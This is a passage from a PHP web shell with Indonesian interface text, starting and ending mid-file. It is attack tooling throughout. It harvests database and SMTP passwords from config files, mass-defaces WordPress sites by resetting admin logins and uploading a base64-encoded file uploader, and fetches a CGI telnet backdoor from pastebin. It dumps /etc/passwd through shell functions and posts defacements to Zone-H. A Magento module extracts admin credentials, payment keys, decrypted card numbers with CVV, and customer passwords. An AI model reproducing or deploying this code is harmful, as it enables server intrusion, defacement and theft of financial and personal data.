644.                 } elseif(preg_match("/^[client]$/", $ambil)) {
645.                     preg_match("/password=(.*?)/", $ambil, $pass1);
646.                     if(preg_match('/"/', $pass1[1])) {
647.                         $pass1[1] = str_replace('"', "", $pass1[1]);
648.                         $pass .= $pass1[1]."\n";
649.                     } else {
650.                         $pass .= $pass1[1]."\n";
651.                     }
652.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
653.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
654.                 }
655.             }
656.             echo $pass;
657.         }
658.         $cp_pass = cp_pass($dir);
659.         echo $cp_pass;
660.         echo "</textarea><br>
661.        <input type='submit' name='crack' style='width: 450px;' value='Crack'>
662.        </form>
663.        <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
664.     }
665. //Auto Edit Title WP
666. } elseif($_GET['gladz404'] == 'edit_title_wp') {
667.     if($_POST['hajar']) {
668.         $title = htmlspecialchars($_POST['new_title']);
669.         $pn_title = str_replace(" ", "-", $title);
670.         if($_POST['cek_edit'] == "Y") {
671.             $script = $_POST['edit_content'];
672.         } else {
673.             $script = $title;
674.         }
675.         $conf = $_POST['config_dir'];
676.         $scan_conf = scandir($conf);
677.         foreach($scan_conf as $file_conf) {
678.             if(!is_file("$conf/$file_conf")) continue;
679.             $config = file_get_contents("$conf/$file_conf");
680.             if(preg_match("/WordPress/", $config)) {
681.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
682.                 $dbuser = ambilkata($config,"DB_USER', '","'");
683.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
684.                 $dbname = ambilkata($config,"DB_NAME', '","'");
685.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
686.                 $prefix = $dbprefix."posts";
687.                 $option = $dbprefix."options";
688.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
689.                 $db = mysql_select_db($dbname);
690.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
691.                 $result = mysql_fetch_array($q);
692.                 $id = $result[ID];
693.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
694.                 $result2 = mysql_fetch_array($q2);
695.                 $target = $result2[option_value];
696.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
697.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
698.                 echo "<div style='margin: 5px auto;'>";
699.                 if($target == '') {
700.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
701.                 } else {
702.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
703.                 }
704.                 if(!$update OR !$conn OR !$db) {
705.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
706.                 } else {
707.                     echo "<font color=lime>sukses di ganti.</font><br>";
708.                 }
709.                 echo "</div>";
710.                 mysql_close($conn);
711.             }
712.         }
713.     } else {
714.         echo "<center>
715.        <h1>Auto Edit Title WordPress dan Content</h1></center>
716.        <form method='post'>
717.        DIR Config: <br>
718.        <input type='text' size='50' name='config_dir' value='$path'><br><br>
719.        Set Title: <br>
720.        <input type='text' name='new_title' value='Hacked By ./Mr.GLADz404' placeholder='New Title'><br><br>
721.        Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
722.        <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
723.        <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/raw/pa6yLnny' style='width: 450px; height: 150px;'></textarea><br>
724.        <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
725.        </form>
726.        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/gladz404_config )</span><br>
727.        ";
728.     }
729.  
730. //WP AUTO PEPES
731. } elseif($_GET['gladz404'] == 'autodwp') {
732.     if($_POST['auto_deface_wp']) {
733.         function anucurl($sites) {
734.             $ch = curl_init($sites);
735.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
736.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
737.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
738.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
739.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
740.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
741.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
742.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
743.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
744.             $data = curl_exec($ch);
745.                   curl_close($ch);
746.             return $data;
747.         }
748.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
749.             $post = array(
750.                    "log" => "$userr",
751.                    "pwd" => "$pass",
752.                    "rememberme" => "forever",
753.                    "wp-submit" => "$wp_submit",
754.                    "redirect_to" => "$web",
755.                    "testcookie" => "1",
756.                    );
757.             $ch = curl_init($cek);
758.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
759.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
760.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
761.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
762.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
763.                   curl_setopt($ch, CURLOPT_POST, 1);
764.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
765.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
766.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
767.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
768.             $data = curl_exec($ch);
769.                   curl_close($ch);
770.             return $data;
771.         }
772.         $scan = $_POST['link_config'];
773.         $link_config = scandir($scan);
774.         $script = htmlspecialchars($_POST['script']);
775.         $user = "gladz404";
776.         $pass = "gladz404";
777.         $passx = md5($pass);
778.         foreach($link_config as $dir_config) {
779.             if(!is_file("$scan/$dir_config")) continue;
780.             $config = file_get_contents("$scan/$dir_config");
781.             if(preg_match("/WordPress/", $config)) {
782.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
783.                 $dbuser = ambilkata($config,"DB_USER', '","'");
784.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
785.                 $dbname = ambilkata($config,"DB_NAME', '","'");
786.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
787.                 $prefix = $dbprefix."users";
788.                 $option = $dbprefix."options";
789.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
790.                 $db = mysql_select_db($dbname);
791.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
792.                 $result = mysql_fetch_array($q);
793.                 $id = $result[ID];
794.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
795.                 $result2 = mysql_fetch_array($q2);
796.                 $target = $result2[option_value];
797.                 if($target == '') {                
798.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
799.                 } else {
800.                     echo "[+] $target <br>";
801.                 }
802.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
803.                 if(!$conn OR !$db OR !$update) {
804.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
805.                     mysql_close($conn);
806.                 } else {
807.                     $site = "$target/wp-login.php";
808.                     $site2 = "$target/wp-admin/theme-install.php?upload";
809.                     $b1 = anucurl($site2);
810.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
811.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
812.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
813.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
814.                     $www = "m.php";
815.                     $fp5 = fopen($www,"w");
816.                     fputs($fp5,$upload3);
817.                     $post2 = array(
818.                             "_wpnonce" => "$anu2",
819.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
820.                             "themezip" => "@$www",
821.                             "install-theme-submit" => "Install Now",
822.                             );
823.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
824.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
825.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
826.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
827.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
828.                           curl_setopt($ch, CURLOPT_POST, 1);
829.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
830.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
831.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
832.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
833.                     $data3 = curl_exec($ch);
834.                           curl_close($ch);
835.                     $y = date("Y");
836.                     $m = date("m");
837.                     $namafile = "id.php";
838.                     $fpi = fopen($namafile,"w");
839.                     fputs($fpi,$script);
840.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
841.                            curl_setopt($ch6, CURLOPT_POST, true);
842.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
843.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
844.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
845.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
846.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
847.                     $postResult = curl_exec($ch6);
848.                            curl_close($ch6);
849.                     $as = "$target/k.php";
850.                     $bs = anucurl($as);
851.                     if(preg_match("#$script#is", $bs)) {
852.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
853.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
854.                         } else {
855.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
856.                         echo "[!!] coba aja manual: <br>";
857.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
858.                         echo "[+] username: <font color=lime>$user</font><br>";
859.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
860.                         }
861.                     mysql_close($conn);
862.                 }
863.             }
864.         }
865.     } else {
866.         echo "<center><h1>WordPress Auto Deface</h1>
867.        <form method='post'>
868.        <input type='text' name='link_config' size='50' height='10' value='$path'><br>
869.        <input type='text' name='script' height='10' size='50' placeholder='Hacked by ./Mr.GLADz404' required><br>
870.        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
871.        </form>
872.        <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/gladz404_config )</span>
873.        </center>";
874.     }
875.    
876. //CGI TELNET
877. } elseif($_GET['gladz404'] == 'cgi') {
878.     $cgi_dir = mkdir('gladz404_cgi', 0755);
879.     $file_cgi = "gladz404_cgi/cgi.izo";
880.     $isi_htcgi = "AddHandler cgi-script .izo";
881.     $htcgi = fopen(".htaccess", "w");
882.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
883.     $cgi = fopen($file_cgi, "w");
884.     fwrite($cgi, $cgi_script);
885.     fwrite($htcgi, $isi_htcgi);
886.     chmod($file_cgi, 0755);
887.     echo "<font color=red>Password: gladz404</font>";
888.     echo "<iframe src='gladz404_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
889.  
890. //Bypass /etc/passwd
891. } elseif($_GET['gladz404'] == 'bypass_etc') {
892.     echo '<br><center>Bypass /etc/passwd With :<br>
893. <table style="width:50%">
894.  <tr>
895.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
896.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
897.    <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
898.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
899.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="mix"></form></td>
900. </tr></table></center>Bypass User With : <table style="width:50%">
901. <tr>
902.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
903.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
904.    <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
905.    <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
906.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
907. </tr>
908. </table><br>';
909.  
910.  
911. if ($_POST['awkuser']) {
912. echo"<textarea class='inputzbut' cols='65' rows='15'>";
913. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
914. echo "</textarea><br>";
915. }
916. if ($_POST['systuser']) {
917. echo"<textarea class='inputzbut' cols='65' rows='15'>";
918. echo system("ls /var/mail");
919. echo "</textarea><br>";
920. }
921. if ($_POST['passthuser']) {
922. echo"<textarea class='inputzbut' cols='65' rows='15'>";
923. echo passthru("ls /var/mail");
924. echo "</textarea><br>";
925. }
926. if ($_POST['exuser']) {
927. echo"<textarea class='inputzbut' cols='65' rows='15'>";
928. echo exec("ls /var/mail");
929. echo "</textarea><br>";
930. }
931. if ($_POST['shexuser']) {
932. echo"<textarea class='inputzbut' cols='65' rows='15'>";
933. echo shell_exec("ls /var/mail");
934. echo "</textarea><br>";
935. }
936. if($_POST['syst'])
937. {
938. echo"<textarea class='inputz' cols='65' rows='15'>";
939. echo system("cat /etc/passwd");
940. echo"</textarea><br><br><b></b><br>";
941. }
942. if($_POST['passth'])
943. {
944. echo"<textarea class='inputz' cols='65' rows='15'>";
945. echo passthru("cat /etc/passwd");
946. echo"</textarea><br><br><b></b><br>";
947. }
948. if($_POST['ex'])
949. {
950. echo"<textarea class='inputz' cols='65' rows='15'>";
951. echo exec("cat /etc/passwd");
952. echo"</textarea><br><br><b></b><br>";
953. }
954. if($_POST['shex'])
955. {
956. echo"<textarea class='inputz' cols='65' rows='15'>";
957. echo shell_exec("cat /etc/passwd");
958. echo"</textarea><br><br><b></b><br>";
959. }
960. echo '<center>';
961. if($_POST['mix'])
962. {
963. echo"<textarea class='inputz' cols='65' rows='15'>";
964. for($uid=0;$uid<60000;$uid++){
965. $ara = posix_getpwuid($uid);
966. if (!empty($ara)) {
967. while (list ($key, $val) = each($ara)){
968. print "$val:";
969. }
970. print "\n";
971. }
972. }
973. echo"</textarea></center><br><br>";
974. }
975.  
976. //Zone-H Mass Poster
977. } elseif($_GET['gladz404'] == 'zone-h') {
978.     if($_POST['submit']) {
979.         $domain = explode("\r\n", $_POST['url']);
980.         $nick =  $_POST['nick'];
981.         echo "<font color=blue>Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'><font color=orange>http://www.zone-h.org/archive/notifier=$nick/published=0</a></font><br>";
982.         echo "<font color=blue>Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'><font color=orange>http://www.zone-h.org/archive/notifier=$nick</a></font><br><br>";
983.         function zoneh($url,$nick) {
984.             $ch = curl_init("http://www.zone-h.com/notify/single");
985.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
986.                   curl_setopt($ch, CURLOPT_POST, true);
987.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
988.             return curl_exec($ch);
989.                   curl_close($ch);
990.         }
991.         foreach($domain as $url) {
992.             $zoneh = zoneh($url,$nick);
993.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
994.                 echo "$url -> <font color=lime>OK</font><br>";
995.             } else {
996.                 echo "$url -> <font color=red>ERROR</font><br>";
997.             }
998.         }
999.     } else {
1000.         echo "<center><font color=red size=4>Zone-H Mass Poster</center><br>
1001.         <form method='post'>
1002.        <u>Defacer</u>: <br>
1003.        <input type='text' name='nick' size='50' value='./Mr.GLADz404'><br>
1004.        <u>Domains</u>: <br>
1005.        <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1006.        <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1007.        </form></font>";
1008.     }
1009.     echo "</center>";
1010.  
1011. //SMTP
1012. } elseif($_GET['gladz404'] == 'smtp') {
1013.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/gladz404_config )</span></center><br>";
1014.     function scj($dir) {
1015.         $dira = scandir($dir);
1016.         foreach($dira as $dirb) {
1017.             if(!is_file("$dir/$dirb")) continue;
1018.             $ambil = file_get_contents("$dir/$dirb");
1019.             $ambil = str_replace("$", "", $ambil);
1020.             if(preg_match("/JConfig|joomla/", $ambil)) {
1021.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1022.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1023.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1024.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1025.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1026.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1027.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1028.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1029.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1030.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1031.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1032.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1033.             }
1034.         }
1035.     }
1036.     $smpt_hunter = scj($dir);
1037.     echo $smpt_hunter;
1038. echo "</center>";
1039. //MAGENTO HUNTER
1040. } elseif($_GET['gladz404'] == 'magento') {
1041. echo'
1042. <div id="page-wrap">  
1043. <center>  
1044. <FORM action="" method="post"><h1>
1045. <div align="center"><div><span style="color:blue;">[M A G E N T O] - STEALING INFORMATION</span></div></h1><br>  
1046. <div align="center"><font color=orange>coded by sohai & n4KuLa_</font><br>
1047. <div align="center"><font color=orange>recoded by ./Mr.GLADz404</font><br>
1048. <font color="red">INI HANYA DAPAT BERJALAN DI CMS MAGENTO</font><br><br>
1049. <input type="hidden" name="form_action" value="2">  
1050. </div></center>
1051. ';  
1052.  
1053. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){  
1054.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');  
1055.     if(isset($xml->global->resources->default_setup->connection)) {  
1056.        $connection = $xml->global->resources->default_setup->connection;  
1057.        $prefix = $xml->global->resources->db->table_prefix;  
1058.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1  
1059.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';  
1060.          
1061.        try {  
1062.            $app = Mage::app('default');  
1063.         }
1064. catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}  
1065.  
1066.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){  
1067.            print("Could not connect: " . mysql_error());  
1068.        }  
1069.        mysql_select_db($connection->dbname);  
1070.        echo $connection->host." | ".$connection->username." | ".$connection->password." | ".$connection->dbname." | $prefix | $key<br/>\n";  
1071.  
1072.     $crypto = new Varien_Crypt_Mcrypt();  
1073.     $crypto->init($key);  
1074.  
1075.     //=========================================================================================================  
1076.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");  
1077.     if (!$query){  
1078.           echo "<center><b>Gagal</b></center>";  
1079.     }else{  
1080.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));  
1081.           echo'<center><br><br>  
1082.                ====================================================================<br>  
1083.              [ Daftar Admin yang terdaftar di : '.$site['website'].' ] <br>  
1084.                ====================================================================<br></center>';  
1085.     }  
1086.     echo "  
1087.    <table border='1' align='center' >  
1088.    <tr>  
1089.    <td>id</td>  
1090.    <td>firstname</td>  
1091.    <td>lastname</td>  
1092.    <td>email</td>  
1093.    <td>username</td>  
1094.    <td>password</td>  
1095.    </tr>";  
1096.         while($vx = mysql_fetch_array($query)) {  
1097.         $no = 1;  
1098.         $user_id = $vx['user_id'];  
1099.         $username = $vx['username'];  
1100.         $password = $vx['password'];  
1101.         $email = $vx['email'];  
1102.         $firstname = $vx['firstname'];  
1103.         $lastname = $vx['lastname'];  
1104.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";  
1105.         }  
1106.     echo "</table><br>";  
1107.     //=========================================================================================================  
1108.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");  
1109.     if(mysql_num_rows($query) != 0){  
1110.         if (!$query){  
1111.               echo "<center><b>Gagal</b></center>";  
1112.         }else{  
1113.               echo'<br><br>  
1114.                    ====================================================================<br>  
1115.                                    [ Authorizenet ] <br>  
1116.                    ====================================================================<br>';  
1117.         }  
1118.         echo "  
1119.        <table border='1' align='center' >  
1120.        <tr>  
1121.        <td>no</td>  
1122.        <td>user</td>  
1123.        <td>pass</td>      
1124.        </tr>";  
1125.             $no = 1;  
1126.             while($vx = mysql_fetch_array($query)) {  
1127.             $user = $crypto->decrypt($vx['user']);  
1128.             $pass = $crypto->decrypt($vx['pass']);  
1129.  
1130.              
1131.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
1132.             $no++;  
1133.             }  
1134.         echo "</table><br>";  
1135.     }  
1136.     //=========================================================================================================  
1137.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");  
1138.     if(mysql_num_rows($query_smtp) != 0){  
1139.         if (!$query_smtp){  
1140.               echo "<center><b>Gagal</b></center>";  
1141.         }else{  
1142.               echo'<br><br>  
1143.                    ====================================================================<br>  
1144.                                    [ SMTP ] <br>  
1145.                    ====================================================================<br>';  
1146.         }  
1147.         echo "  
1148.        <table border='1' align='center' >  
1149.        <tr>  
1150.        <td>no</td>  
1151.        <td>host</td>          
1152.        <td>port</td>  
1153.        <td>user</td>  
1154.        <td>pass</td>      
1155.        </tr>";  
1156.             $no = 1;  
1157.             $batas = 0;  
1158.             while($rows = mysql_fetch_array($query_smtp)) {  
1159.                 $smtphost = $rows[0];  
1160.                 $smtpport = $rows[1];  
1161.                 $smtpuser = $rows[2];  
1162.                 $smtppass = $rows[3];  
1163.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";  
1164.                 $no++;  
1165.             }  
1166.         echo "</table><br>";  
1167.     }  
1168.     //=========================================================================================================  
1169.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");  
1170.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
1171.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){  
1172.           echo'<br><br>  
1173.                ====================================================================<br>  
1174.                                [ Credit Card ] <br>  
1175.                ====================================================================<br>';  
1176.             echo "
1177.            <table border='1' align='center'>  
1178.            <tr>  
1179.            <td>no</td>  
1180.            <td>Date</td>  
1181.            <td>Credit Owner</td>  
1182.            <td>method</td>  
1183.            <td>Credit Number</td>  
1184.            <td>Credit Exp</td>  
1185.            <td>CVV</td>  
1186.            <td>Address</td>  
1187.            </tr>";  
1188.                 $no = 1;  
1189.                 $batas = 0;  
1190.                 while($vx = mysql_fetch_array($query)){  
1191.                 $date = $vx['updated_at'];  
1192.                 $cc_owner = $vx['cc_owner'];  
1193.                 $method = $vx['method'];  
1194.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);  
1195.                 $exp = $vx['exp'];          
1196.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);      
1197.                 $Billing_Address = $vx['Billing Address'];  
1198.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";  
1199.                 $batas = $no++;  
1200.                 }  
1201.                  
1202.                 while($vx2 = mysql_fetch_array($query2)){  
1203.                     $batas +=1;  
1204.                 $cc_owner = $vx2['cc_owner'];  
1205.                 $method = $vx2['method'];  
1206.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
1207.                 $exp = $vx2['exp'];          
1208.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
1209.                 $Billing_Address = $vx2['Billing Address'];  
1210.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";  
1211.                  $batas++;  
1212.                 }      
1213.                  
1214.             echo "</table><br><br>";      
1215.     }  
1216.     //=========================================================================================================  
1217.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");  
1218.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");  
1219.      
1220.      
1221.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){  
1222.         if (!$query){  
1223.               echo "<center><b>Gagal</b></center>";  
1224.         }else{  
1225.               echo'<br><br>  
1226.                    ====================================================================<br>  
1227.                                    [ Customer ] <br>  
1228.                    ====================================================================<br>';  
1229.         }  
1230.         echo "  
1231.        <table border='1' align='center' >  
1232.        <tr>  
1233.        <td>no</td>  
1234.        <td>user</td>  
1235.        <td>pass</td>      
1236.        </tr>";  
1237.             $no = 1;  
1238.             $batas = 0;  
1239.             while($vx = mysql_fetch_array($query)) {  
1240.                 $user = $vx['email'];  
1241.                 $pass = $vx['value'];  
1242.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
1243.                 $batas = $no++;  
1244.             }  
1245.              
1246.             if(mysql_num_rows($query2) != 0 && ($query2)){  
1247.                 while($vx2 = mysql_fetch_array($query2)){  
1248.                     $user = $vx2['customer_email'];  
1249.                     $pass = $crypto->decrypt($vx2['password_hash']);  
1250.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin  
1251.                         $batas +=1;  
1252.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";  
1253.                         $batas++;  
1254.                     }  
1255.                 }                  
1256.             }  
1257.          
1258.         echo "</table><br>";  
1259.     }  
1260.     //=========================================================================================================  
1261.   }  
1262. }  
1263. function save($format,$data){  
1264.     $fp = fopen($format, 'a');  
1265.     fwrite($fp, $data);  
1266.     fclose($fp);  
1267. }  
1268. function cekbase64($string){  
1269.         $decoded = base64_decode($string, true);  
1270.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;  
1271.         if(!base64_decode($string, true)) return false;  
1272.         if(base64_encode($decoded) != $string) return false;  
1273.         return true;//nilai return 1 jika true  
1274.     }  
1275. //----untuk decode password ---/  
1276. class Varien_Crypt_Mcrypt{  
1277.     /**  
1278.      * Constuctor  
1279.      *  
1280.      * @param array $data  
1281.      */  
1282.     public function __construct()  
1283.     {  
1284.     }  
1285.  
1286.     /**  
1287.      * Initialize mcrypt module  
1288.      *  
